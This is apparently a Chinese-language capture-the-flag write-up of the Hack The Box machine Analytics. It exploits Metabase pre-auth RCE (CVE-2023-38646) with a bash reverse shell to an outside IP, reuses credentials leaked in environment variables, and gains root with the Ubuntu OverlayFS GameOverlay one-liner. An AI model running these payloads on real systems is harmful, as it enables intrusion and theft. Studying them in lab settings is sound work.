基本信息
- https://app.hackthebox.com/machines/Analytics
- 10.10.11.233
data:image/s3,"s3://crabby-images/eff01/eff01df3b2590bfd6b31cc0f72246471ac173741" alt=""
端口扫描
22和80:
1 | nmap -sC -sV -Pn 10.10.11.233 |
80
需要加hosts:
1 | 10.10.11.233 analytical.htb |
数据分析服务相关,右上角login得到子域名data:
data:image/s3,"s3://crabby-images/59749/5974919201b1dd39da76a8b79253fff46acc31c8" alt=""
data.analytical.htb
同样加hosts后访问,是一个Metabase:
data:image/s3,"s3://crabby-images/dc121/dc121681983808479386657c85b2e5eca73d38ca" alt=""
Metabase
响应信息中可以得到Metabase版本信息:
data:image/s3,"s3://crabby-images/6b6da/6b6da5716ef8068a22580b29f6e521767e055d22" alt=""
搜索可以找到相关漏洞:
- Chaining our way to Pre-Auth RCE in Metabase (CVE-2023-38646) – Assetnote
https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/ - shamo0/CVE-2023-38646-PoC: Metabase Pre-auth RCE
https://github.com/shamo0/CVE-2023-38646-PoC
根据文章,利用过程分两部分,第一部分获取token,第二部分利用sql
token
通过文章中给出的接口获取setup-token:
1 | 249fa03d-fd94-4d5b-b94f-b4ebf3df681f |
data:image/s3,"s3://crabby-images/2bd6f/2bd6f0e14207860e3e352083fc0d574fe8755ad0" alt=""
shell
第二步,使用得到的token来利用RCE,使用的payload根据文章和github中的结合而来:
1 | echo "/bin/bash -i >&/dev/tcp/10.10.16.10/4444 0>&1" | base64 |
data:image/s3,"s3://crabby-images/c96cf/c96cf7facaa6adabd37c6a7e0e69ca7d941a0ae1" alt=""
打到容器内metabase:
data:image/s3,"s3://crabby-images/11f95/11f9513c5265eac807766e6e5131e0df3018e16a" alt=""
信息
metabase容器内环境变量中得到一组账号密码:
1 | META_USER=metalytics |
data:image/s3,"s3://crabby-images/b7681/b7681ad2887161e3b3b8dd178c3970bdc814f7e5" alt=""
user flag
得到的账号密码可以ssh登录宿主机:
data:image/s3,"s3://crabby-images/de40d/de40d69d93e51b0b24789375c52c7e81f1f9c375" alt=""
提权信息
根据内核版本,搜到相关漏洞:
- GameOverlay Vulnerability Impacts 40% of Ubuntu Workloads | Wiz Blog
https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability - Ubuntu Local Privilege Escalation (CVE-2023-2640 & CVE-2023-32629) : r/selfhosted
https://www.reddit.com/r/selfhosted/comments/15ecpck/ubuntu_local_privilege_escalation_cve20232640/
提权 & root flag
exp一键(某些其他老漏洞exp也能打,但应该是非预期,easy难度没那么麻烦):
1 | unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")' |
data:image/s3,"s3://crabby-images/fdb08/fdb08cec375b0fdb4f68cab4d2113e8b40368b7b" alt=""
shadow
1 | root:$y$j9T$aVUkVU8LWFNEuXdwrOIJH.$jF8hy0vMzBJTvu/.HkzP0E4ZObo1I.frOPRVj2ktqM2:19576:0:99999:7::: |
参考资料
- Chaining our way to Pre-Auth RCE in Metabase (CVE-2023-38646) – Assetnote
https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/ - shamo0/CVE-2023-38646-PoC: Metabase Pre-auth RCE
https://github.com/shamo0/CVE-2023-38646-PoC - GameOverlay Vulnerability Impacts 40% of Ubuntu Workloads | Wiz Blog
https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability - Ubuntu Local Privilege Escalation (CVE-2023-2640 & CVE-2023-32629) : r/selfhosted
https://www.reddit.com/r/selfhosted/comments/15ecpck/ubuntu_local_privilege_escalation_cve20232640/